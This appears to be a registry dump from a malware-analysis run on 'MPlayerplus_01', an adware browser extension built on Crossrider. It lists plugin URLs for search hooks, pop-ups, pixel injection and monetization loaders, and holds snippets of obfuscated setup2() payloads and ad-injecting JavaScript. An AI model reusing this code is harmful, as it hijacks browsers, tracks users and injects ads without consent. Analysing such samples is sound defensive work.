"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActi.'"
[HKCU\Software\MPlayerplus_01\Plugins\41]
"Version" = "7"
[HKCU\Software\MPlayerplus_01\Plugins\14]
"Version" = "11"
[HKCU\Software\MPlayerplus_01\Plugins\184]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE3YzdhNTEwZjBjMDMxNTJkMGEwNjU0NDk1MzQ1MTAwMzExMDg0MjQ1NTkxZDAzMTQ1NjE5MGEwODBhMDUxNDFmMTYwYTA4MDcwNjU2MWIwNTFiNWMxZDE3MGIxNTRhMTQxNzBkMWYxMDVkMGQwYjQ4MmEwYTExMGQxZjFkM2EwMzQ1MzI1ZDM5NGMyYjQ0NDAzMjRhM2E0NzU2NGM1NTJmNDQ0MjQyNGEzOTRlMjQ0ODU1NWE0NjQyNDY1NjRmMzM1NDQ4M2U1YzMzNTUyMDBlMGMxMjJjMWM0NTM5MTcxZjE2MTQ1ZTI3MDQwYTBjMDQxMzAxM2EyMzQ1NDU1NTQ4NDg1YTUwMjMwMTA4MWMwMjA2MGMzNjBiMWIxNjRlMzgyNzM0MzczNzJiMzkyNDNhMzcyMjJhMjgyNDI4MjgzNTM4MzIzZTIyMjcyODQzMmMxNzA1MWExMTEyMTUzMTEzNTgyNzI3MjkyNDNjMjAzNDJhM2UyMTNkMmEzNTI1MjYzMTM4MzEzMzNhMjc1YTQ2N2M3YTUxMGYwYzAzMTUwYjJkMTgxYTUxNDk0NzVhMWYxMTBjMDgxOTRjNWM1YzA5MDgwNDRiMTYxNzFhMDQxYzExMGIxZDFhMTUwODFiNDQxNTFjMWU0ODE2MDcxNjFhNTcwNjE5MTQxYTA0NTYxZDE2NDczNzE4MWYxNDFhMDkzMTEzNTgzZDQwMmI0MjMyNDE1NDM5NWEyNzQ4NGI1ZTViMzY0MTU2NDk1YTI0NDEzOTVhNWI0MzQzNTY0ZDQ2NTIzYzQ5NWEzMDQ1MzY0MTJiMWUxMTFkMzEwZTRiMjAxMjBiMWQwNDQzMjgxOTE4MDIxZDE2MTUzMTMzNTg0YTQ4NWE0NjQzNTUzNzBhMTgwMTBkMWIxZTM4MTIxZTAyNDUyODNhM2IyYTI1MjUyMDIxMmUzYzMyMzcyNzM5M2EyNjJjM2QyNjM1MzI'"
[HKCU\Software\MPlayerplus_01\Manifest]
"homepageurl" = "NA"
[HKCU\Software\MPlayerplus_01\Plugins\182]
"URL" = "http://js.clientstaticserv.com/plugins/mins/openUrl.js"
[HKCU\Software\MPlayerplus_01\Plugins\9]
"URL" = "http://js.clientstaticserv.com/plugins/mins/searchengines_hook.js"
[HKCU\Software\MPlayerplus_01\Plugins\91]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/monetizationLoader.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\MPlayerplus_01\Plugins\39]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEDatabase.js"
[HKCU\Software\MPlayerplus_01\Plugins\38]
"Name" = "IECallbacks"
[HKCU\Software\MPlayerplus_01\Manifest]
"PluginsManifestVersion" = "27"
[HKCU\Software\MPlayerplus_01\Installer]
"srcid" = "001359"
[HKCU\Software\MPlayerplus_01\Plugins\1]
"JavaScript" = "appAPI._cr_config={appID:function(){var a=appAPI.appInfo;if(a){return appAPI.appInfo.id;}else{return appAPI.appID;}}};$jquery.extend(appAPI._cr_config,{sidebar:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},css:/plugins/stylesheets/sidebar.css,themes:/plugins/images/sidebar}});$jquery.extend(appAPI._cr_config,{notifications_manager:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},statsBase:{production:http://nstats.crossrider.com,staging:http://staging-app.crossrider.com},geolocation:http://www.geoplugin.net/json.gp?jsoncallback=fn,meta:/notifier/ appAPI._cr_config.appID() /meta.json,messages:/notifier/ appAPI._cr_config.appID() /{id}.json,logger:/notifications.gif,loggerAPI:/api_notifications.gif},notifications:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},css:/plugins/stylesheets/notifications.css,themes:/plugins/images/notifications}});'"
[HKCU\Software\MPlayerplus_01\Plugins\221]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Manifest]
"ModeType" = "production"
[HKCU\Software\MPlayerplus_01\Plugins\43]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins\37]
"Name" = "IEBrowserEvents"
[HKCU\Software\MPlayerplus_01\Plugins\45]
"Name" = "IEOnRequest"
[HKCU\Software\MPlayerplus_01\Plugins\72]
"JavaScript" = "if(appAPI.__should_activate_validation__===true){(function(){var e={WRONG_STRICT_VALUE:Parameter %PARAM_NAME% value is not supported.,WRONG_TYPE:Parameter %PARAM_NAME% is of wrong type. Valid types: [%VALID_TYPES%].,PARAM_IS_MANDATORY:Parameter %PARAM_NAME% is mandatory.,DB_VAL_TOO_LARGE:appAPI.db storage is limited to 1000 bytes per key. For larger values please use appAPI.db.async};var a=function(m){return m.charAt(0).toUpperCase() m.slice(1);};var h={};var b=appAPI.appInfo.name;var i=function(o,r,q,p){if(typeof p===undefined){p=;}var n=[ new Date().toDateString() new Date().toLocaleTimeString() ] b;var m=;if(typeof console!==undefined){if((q===e.DB_VAL_TOO_LARGE)&&(typeof console.warn===function)){console.warn(n m);}else{if(typeof console.error===function){console.error(n m);}else{if(typeof console.log===function){console.log(n m);}}}}return;};var l=function(p,n,o){var m=p7'"
[HKCU\Software\MPlayerplus_01\Plugins\226]
"URL" = "http://js.clientstaticserv.com/plugins/javascripts/monetization/geo/set_campaign_id_m.js"
[HKCU\Software\MPlayerplus_01\Plugins\184]
"Version" = "9"
[HKCU\Software\MPlayerplus_01\Plugins\242]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTU3YjZjNTMxZDExMTgxMzI1MWYwMjUzNWY1MTU3MGQxODE3MDA1NzQxNWUwYzFmMDYxMTQyMTAxODAyMWUwMTBjMWYxMjA0MTgwNjVlMDQwMDE3MGE1ZTFmMTY0MzEwMTczMjBjMTY0YjFiMDY1YTJkMjUzNjI0MjIzODI0MjUzMDNhMjUyNzRkMGUxYzAyMTcxNTA3NDMzZjM2MzIzMjJhMzgzNjI1MjcyYzJlMzYyNDI4M2MyZTJjMzU0ODNhMzMyMDIyMjIzZDIyMzczODMxMjAzZTNjMjMzODJjMmUyYzM1MmEzYTRhMjEyMjJjMjAzNTNhMzUzYzM2M2MyZjMxMzQzMTNmMjQzYzMwNTgzMzNjMzMzZjIxMjIzNjIzM2MyMTI5MzEyZjJjM2UyMTNhM2YzNDI4MjkzYzJmNGY0MjdiNmM1MzFkMTExODEzMDMzODFjMWQ0NzRiNTU0NzA0MTcwNDFkMWQ0YjRhNWUxYzBiMWYxNzVlMWUwNjFlMTUwMTFjMGIwYjAyMDQwODQwMTgwYjE3MWE0YTA2MTA1ZjFlMDkyZTA3MTY1YjBmMWY1YzMxMmIyODM4MjkzODM0MzEyOTNjMzkyOTUzMTIxNzAyMDcwMTFlNDUyMzM4MmMyZTIxMzgyNjMxM2UyYTMyMzgzYTM0MzcyZTNjMjE1MTNjMmYyZTNjM2UzNjIyMjcyYzI4MjYyMjMyM2QyNDI3MmUzYzIxMzMzYzU2MmYzYzMwMmIzNTJhMjEyNTMwMjAyMTJmMjgzYTNmMzQyODI5NWUyZjMyMmQyMzJhMjIyNjM3MjUyNzM1M2YzMTMwMzUyMTJhMmIyZDJlMzUzMjMxNTM0OTdiN2M0NzFjMGYwNTBhMDcxZjJjMTU1NzVmNGM1MTQ0NWY0MjdiNDU1MTU1NDU0ZTE1MTUxZjFhMTgwNjEwMTk0NzU2NDMyYjRmMWQxOTBhMDEwNTBjMDI'"
[HKCU\Software\MPlayerplus_01\Plugins\64]
"Name" = "appApiMessage"
[HKCU\Software\MPlayerplus_01\Plugins\36]
"Name" = "IEBackground"
[HKCU\Software\MPlayerplus_01\Plugins\46]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setIn"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 41 CE 2B BB 4C A3 24 E4 2A CD 47 B6 97 AF AC"
[HKCU\Software\MPlayerplus_01\Plugins\190]
"JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[190] = function() { if (!appAPI.internal.monetization.shouldRunByVertical(190, [pops])){ return; } var subId = appAPI.internal.monetization.getSubId(); subId = subId.substr(0,7) 00000000000; var _GPL_loader = { vars: {}, ivars: {}, proto: appAPI.dom.isHttps() ? https:// : http://, baseCDN: cdncache1-a.akamaihd.net, init: function() { var a = ; $jquery.each(this.vars, function(b, c) { a = b = c &"
[HKCU\Software\MPlayerplus_01\Plugins]
"BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64,72"
[HKCU\Software\MPlayerplus_01\Plugins\22]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins\28]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\39]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins\64]
"URL" = "http://js.clientstaticserv.com/plugins/mins/appApiMessage.js"
[HKCU\Software\MPlayerplus_01\Plugins\9]
"Version" = "3"
[HKCU\Software\MPlayerplus_01\Plugins\3]
"Name" = "ie8_fix_2"
[HKCU\Software\MPlayerplus_01\Plugins\94]
"Name" = "IEPopup"
[HKCU\Software\MPlayerplus_01\Plugins\14]
"Name" = "CrossriderUtils"
[HKCU\Software\MPlayerplus_01\Plugins\39]
"Name" = "IEDatabase"
[HKCU\Software\MPlayerplus_01\Plugins\1]
"Version" = "10"
[HKCU\Software\MPlayerplus_01\Plugins\220]
"Version" = "8"
[HKCU\Software\MPlayerplus_01\Manifest]
"EnableSearchIE" = "false"
[HKCU\Software\MPlayerplus_01\Plugins\21]
"Name" = "debug"
[HKCU\Software\MPlayerplus_01\Plugins\44]
"Name" = "IEMisc"
[HKCU\Software\MPlayerplus_01\Plugins\103]
"URL" = "http://js.clientstaticserv.com/plugins/javascripts/monetization/geo/intext_5_m.js"
[HKCU\Software\MPlayerplus_01\Plugins\177]
"JavaScript" = "(function(){if(!(appAPI.isMatchPages&&appAPI.isMatchPages(*crossrider.com/extension_dashboard/dashboard.html))){return;}function o(p){return String(p).replace(//g,>);}function e(aR,aC){function aW(){while(aE.length&&(aE[aE.length-1]=== ||aE[aE.length-1]===aT)){aE.pop();}}function aq(p){return p===[EXPRESSION]||p===[INDENTED-EXPRESSION];}function af(p){return p.replace(/^\s\s*|\s\s*$/,);}function an(q){aQ.eat_next_space=false;if(ag&&aq(aQ.mode)){return;}q=typeof q===undefined?true:q;aQ.if_line=false;aW();if(!aE.length){return;}if(aE[aE.length-1]!==\n||!q){ac=true;aE.push(\n);}for(var p=0;p
[HKCU\Software\MPlayerplus_01\Plugins\40]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEExtension.js"
[HKCU\Software\MPlayerplus_01\Plugins\191]
"Name" = "ciuvo_m"
[HKCU\Software\MPlayerplus_01\Plugins\93]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/superfish_no_coupons_m.js"
[HKCU\Software\MPlayerplus_01\Plugins\191]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/ciuvo_m.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\MPlayerplus_01\Plugins\182]
"Version" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\MPlayerplus_01\Plugins\104]
"Version" = "9"
[HKCU\Software\MPlayerplus_01\Plugins\43]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to pars"
[HKCU\Software\MPlayerplus_01\Plugins\184]
"Name" = "noproblemppc_m"
[HKCU\Software\MPlayerplus_01\Plugins\22]
"Name" = "resources"
[HKCU\Software\MPlayerplus_01\Plugins\1]
"URL" = "http://js.clientstaticserv.com/plugins/mins/base.js"
[HKCU\Software\MPlayerplus_01\Plugins\3]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Plugins\2]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie8_fix_1.js"
[HKCU\Software\MPlayerplus_01\Plugins\103]
"JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[103] = function() { if (!appAPI.internal.monetization.shouldRunByVertical(103, [intext])){ return; } var subId = appAPI.internal.monetization.getSubId(); subId = subId.substr(0,7) 00000000000; var _GPL_loader = { vars: {}, ivars: {}, proto: appAPI.dom.isHttps() ? https:// : http://, baseCDN: cdncache1-a.akamaihd.net, init: function() { var a = ; $jquery.each(this.vars, function(b, c) { a = b = c &"
[HKCU\Software\MPlayerplus_01\Manifest]
"Version" = "33"
[HKCU\Software\MPlayerplus_01\Installer]
"DefaultBrowser" = "ie"
[HKCU\Software\MPlayerplus_01\Plugins]
"NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,72,28"
[HKCU\Software\MPlayerplus_01\Plugins\38]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Installer]
"osName" = "XP32"
[HKCU\Software\MPlayerplus_01\Plugins\242]
"Version" = "3"
[HKCU\Software\MPlayerplus_01\Plugins\41]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEInfo.js"
[HKCU\Software\MPlayerplus_01\Plugins\221]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(!appAPI.internal.monetization.shouldRunByVertical(221,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:DOWNLOADS}))();};"
[HKCU\Software\MPlayerplus_01\Plugins\244]
"Name" = "engageya_inner_m"
[HKCU\Software\MPlayerplus_01\Manifest]
"SetNewTab" = "false"
"Manifest" = "NA"
[HKCU\Software\MPlayerplus_01\Plugins\40]
"Name" = "IEExtension"
[HKCU\Software\MPlayerplus_01\Plugins\102]
"Version" = "6"
[HKCU\Software\MPlayerplus_01\Plugins\103]
"Version" = "8"
[HKCU\Software\MPlayerplus_01\Plugins\78]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins\233]
"Name" = "revizer_p_dynamic_b2b_2_m"
[HKCU\Software\MPlayerplus_01\Manifest]
"PublisherName" = "Freeven"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\MPlayerplus_01\Plugins\72]
"Name" = "appApiValidation"
[HKCU\Software\MPlayerplus_01\Plugins\226]
"Name" = "set_campaign_id_m"
[HKCU\Software\MPlayerplus_01\Installer]
"StatsDomain" = "http://stats.clientstaticserv.com"
[HKCU\Software\MPlayerplus_01\Plugins\220]
"Name" = "icm_base_m"
[HKCU\Software\MPlayerplus_01\Plugins\207]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Plugins\44]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEMisc.js"
[HKCU\Software\MPlayerplus_01\Installer]
"FullVersionForUrl" = "1_34_05_12"
[HKCU\Software\MPlayerplus_01\Plugins\104]
"Name" = "jollywallet_m"
[HKCU\Software\MPlayerplus_01\Plugins\28]
"URL" = "http://js.clientstaticserv.com/plugins/mins/initializer.js"
[HKCU\Software\MPlayerplus_01\Manifest]
"UninstallerOfferUrl" = "NA"
[HKCU\Software\MPlayerplus_01\Plugins\7]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Plugins\190]
"Name" = "pops_5_m"
[HKCU\Software\MPlayerplus_01\Plugins\28]
"JavaScript" = "var CrossriderInitializerPlugin=(function(e){var c={appId:appAPI._cr_config.appID()},b,g=new e.Deferred(),f;return e.Class.extend({init:function(){b=this;e(document).ready(function(){if(!f){d();}e(body).bindExtensionEvent(__CR_REQUEST_READY,a);});},isReady:function(h){if(h===false){d();}return g.promise();}});function d(){g.resolve();f=true;}function a(){e(body).fireExtensionEvent(__CR_RESPONSE_READY,{appId:c.appId});}}($jquery_171));(function(a){appAPI.initializerPlugin=new CrossriderInitializerPlugin();}($jquery_171));"
[HKCU\Software\MPlayerplus_01\Plugins\47]
"JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:http://resources.crossrider.com,staging:http://staging-app.crossrider.com},update:/apps/{appId}/resources/meta/{lastVersion}},env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:(appAPI.internal.debug.isDebugMode()&&appAPI.internal.db.get(debug_resources_path))},w=o(meta)||{},g=o(remote_resources)||{remoteId:0},t=o(queue)||{},B=o(lastVersion)||0,A,s;appAPI.resources={init:function(){if(C.isDebug){h();}else{l(function(D){if(D){k();}else{h();}});}},isReady:function(D){s=D;if(A){h();}},get:function(D){if(typeof jQuery!==undefined){D=jQuery.trim(D);}return b(D,string);},includeCSS:function(G,F){if(typeof jQuery!==undefined){G=jQuery.trim(G);}var E=b1'"
[HKCU\Software\MPlayerplus_01\Manifest]
"Description" = "MediaPlayerEnhance Extension"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\MPlayerplus_01\Manifest]
"DisableIe" = "true"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\MPlayerplus_01\Plugins\42]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEInternal.js"
[HKCU\Software\MPlayerplus_01\Plugins\207]
"URL" = "http://js.clientstaticserv.com/plugins/mins/dbWrapper.js"
[HKCU\Software\MPlayerplus_01\Plugins\177]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Plugins\22]
"URL" = "http://js.clientstaticserv.com/plugins/mins/resources.js"
[HKCU\Software\MPlayerplus_01\Plugins\35]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k
[HKCU\Software\MPlayerplus_01\Plugins\41]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""
[HKCU\Software\MPlayerplus_01\Plugins\195]
"Version" = "25"
[HKCU\Software\MPlayerplus_01\Plugins\253]
"Name" = "pixel_inject"
[HKCU\Software\MPlayerplus_01\Plugins\36]
"Version" = "8"
[HKCU\Software\MPlayerplus_01\Plugins\253]
"URL" = "http://js.clientstaticserv.com/plugins/mins/pixel_inject.js"
[HKCU\Software\MPlayerplus_01\Plugins\45]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\43]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEMessaging.js"
[HKCU\Software\MPlayerplus_01\Plugins\211]
"Name" = "revizer_ws_dynamic_b2b_light_m"
[HKCU\Software\MPlayerplus_01\Plugins\195]
"Name" = "icm_convertmedia_m"
[HKCU\Software\MPlayerplus_01\Plugins\190]
"Version" = "3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\MPlayerplus_01\Plugins\211]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWU2NzZhNTUxODFkMWQwNzMxMTMwOTRmNTk1NzUyMDExZDAzMTQ1YjRhNDIxMTAxMGExYjQ0MTY0YTAwMGUwYzBlMTYxOTAxMGQ1OTBhMDQxMTQyMTAxMzVmNTg1ZTQ3NTQ0ZTU0NWQ1NzQyNWUwMzFhNTU0ODZiNmM0ZjBiMDMwNDE5MWEyMjE2MGQ0NzU3NDM1NTE4MWQxZDA3MTc1YjRhNDIxMTAxMGExYjQ0MTY0YTAwMGUwYzBlMTYxOTAxMGQ1OTBhMDQxMTQyMTAxMzVmNTg1ZTQ3NTQ0ZTU0NWQ1NzQyNWUwMzFhNTU0ODZiNmM0ZjEzMWIwNTBlMDAxOTJkMDU0NzU3NDM0NTQxNTg0NTdkNDQ0MTQ1NGQ0MTAxMTUxYjFkMWUwNzAwMDk0ZjU5NTcyYjRiMDgxMzE3NDMzODQxNjk1NzUwNDk0OTU1MGQwZjA5MDQwZDEyM2EzYTRiNGQ0NDQzMTIwNDBkMTMxZjFlNDcyODE2MTcxZjVjNTQ0NzQwMTE1ODQ3NTA1NDQ1NTA0MzBjNTA0ZTE5MDIwNjBkMGMxZTBiMTIwMjM2MWEwMjA2MDgwMTRhNTk1NzU3MzYzNjM0MzYyZTM2M2UzMTNlMzQyYzNiMjgyODI4MjIyNTM3MjgyMzNjMmIyODJkMjUzYTMyNDQ1NzViNDk0ZTQ3NTQ1MTU1NWQ1MzQ3NDA1OTU5NDc0MzFjNWU0ZjY5MGE=', 'emcwpiiwda'); }"
[HKCU\Software\MPlayerplus_01\Plugins\45]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEOnRequest.js"
[HKCU\Software\MPlayerplus_01\Plugins\44]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)
[HKCU\Software\MPlayerplus_01\Plugins]
"BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,183,207,47,182,72,93,102,155,184,191,220,195,211,221,226,233,242,244,253,91"
[HKCU\Software\MPlayerplus_01\Manifest]
"ChangePrevious" = "false"
[HKCU\Software\MPlayerplus_01\Plugins\47]
"URL" = "http://js.clientstaticserv.com/plugins/mins/resources_background.js"
[HKCU\Software\MPlayerplus_01\Plugins\184]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/noproblemppc_m.js"
[HKCU\Software\MPlayerplus_01\Plugins\244]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Plugins\17]
"URL" = "http://js.clientstaticserv.com/plugins/mins/jQuery.js"
[HKCU\Software\MPlayerplus_01\Plugins\37]
"Version" = "6"
[HKCU\Software\MPlayerplus_01\Plugins\233]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDg3YzZhNDkxODFiMWIxODIzMDQxZjU0NTk0YjUyMDcxYjFjMDY0YzVjNTkxMTFkMGExZDQyMDk1ODE3MTgxNzBlMGExOTA3MGI0NjE4MTMwNzU5MTAwZjVmNWU1ODU4NDY1OTQyNDY1NjViNWUwNTFjNGE1YTdjN2E1NDBiMWYwNDFmMWMzZDA0MWE1MTRjNDM0OTE4MWIxYjE4MDU0YzVjNTkxMTFkMGExZDQyMDk1ODE3MTgxNzBlMGExOTA3MGI0NjE4MTMwNzU5MTAwZjVmNWU1ODU4NDY1OTQyNDY1NjViNWUwNTFjNGE1YTdjN2E1NDEzMDcwNTA4MDYwNjNmMTI1MTRjNDM1OTQzNWM0MzYyNTY1NjUzNTY0MTFkMTUxZDFiMDExNTE3MWY1NDU5NGIyYjRkMGUwYzA1NTQyZTVhNjk0YjUwNGY0ZjRhMWYxODFmMWYwZDBlM2EzYzRkNTI1NjU0MDQxZjBkMGYxZjE4NDEzNzA0MDAwOTQ3NTQ1YjQwMTc1ZTU4NDM0NjUzNGI0MzEwNTA0ODFmMWQxNDFhMWEwNTBiMGUwMjMwMWMxZDE0MWYxNzUxNTk0YjU3MzAzMDJiMjQzOTIwMjUzMTIyMzQyYTNkMzczYTNmMzQzZTM3MzQyMzNhMmQzNzNmMzIyYzI5NDQ0YjViNGY0ODU4NDY0NjQzNDY1MzViNDA1ZjVmNTg1MTBiNDg1NDY5MTY=', 'svckpoohvv'); }"
[HKCU\Software\MPlayerplus_01\Installer]
"Params" = "{ source_id : 001359, sub_id : 0, uzid : 0"
[HKCU\Software\MPlayerplus_01\Plugins\220]
"JavaScript" = "var ICMBaseManager=function(a){if(appAPI.isBackground){(function(h){var f=false,g=/xyz/.test(function(){xyz;})?/\b_super\b/:/.*/;h.Class=function(){};h.Class.extend=function(m){var l=this.prototype;f=true;var k=new this();f=false;for(var j in m){k[j]=typeof m[j]==function&&typeof l[j]==function&&g.test(m[j])?(function(n,o){return function(){var q=this._super;this._super=l[n];var p=o.apply(this,arguments);this._super=q;return p;};})(j,m[j]):m[j];}function i(){if(!f&&this.init){this.init.apply(this,arguments);}}i.prototype=k;i.prototype.constructor=i;i.extend=arguments.callee;return i;};})($jquery_171);var e={Base64:{_keyStr:ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /=,decode:function(h){var f=;var p,n,l;var o,m,k,j;var g=0;h=h.replace(/[^A-Za-z0-9\ \/\=]/g,);while(g>4);n=((m&15)>2);l=((k&3)
[HKCU\Software\MPlayerplus_01\Plugins\102]
"Name" = "dealply_m"
[HKCU\Software\MPlayerplus_01\Manifest]
"Name" = "MPlayerplus_01"
[HKCU\Software\MPlayerplus_01\Installer]
"Time" = "1413862412"
[HKCU\Software\MPlayerplus_01\Plugins\13]
"Name" = "CrossriderAppUtils"
[HKCU\Software\MPlayerplus_01\Plugins\94]
